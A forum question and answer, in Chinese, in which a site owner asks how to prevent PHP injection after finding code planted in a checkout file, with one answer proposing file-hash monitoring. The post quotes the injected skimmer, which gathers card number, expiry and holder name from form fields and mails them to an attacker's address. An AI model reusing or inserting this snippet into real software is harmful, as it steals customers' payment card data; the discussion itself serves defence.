避免PHP注入以从表单发布数据

Question

我只是在重新测试我们创建的网站中的流程，当我进入Checkout部分时，我意识到页面中有一些我们从未编写过的代码。 这是一次注射，确实使我们感到恐惧。 该代码只是作为文本放置在其中一个checkout文件中，因此由于它不在PHP标记之内，因此无法执行，但是这非常可怕。

该代码本质上是在每个字段上张贴付款说明（卡上的名称，卡类型，卡号，cvc，到期日期），然后执行mail（）php函数将信息发送到特定的电子邮件。 我什至有黑客的电子邮件！！

$message .= "Number : ".$_POST['card_number']."\n";
$message .= "Cvv : ".$_POST['card_brand']."\n";
$message .= "exp : ".$_POST['card_expiration']."\n";
$message .= "Name : ".$_POST['card_holder']."\n";
$i = "______@yahoo.fr";
$subject = "cc";
mail($i,$subject,$message);

我们如何避免在我们的网站中注入PHP？ 我联系了Stripe，后者支持我们的付款，以检查其API是否足够安全。 我觉得是这样的。 但是，像这样的注入可以很容易地破解邮件信息和其他与非付款相关的信息。 我们如何避免在文件中进行注入？

谢谢！！

Answer 1

那将需要一个相当聪明的机器人来检测到该错误并将其注入正确的位置。有人可以访问FTP或上传一个PHP文件管理器-可能来自文件上传脚本。

清理完所有内容后，也许可以对文件进行“哈希快照” ..然后（自动或手动）扫描它们以测试哈希更改。 如果文件中有任何更改，文件的哈希也将更改-那么您可以让它提醒某人。 从那里，您可以浏览日志并尝试找出它的来源。

只是一个主意。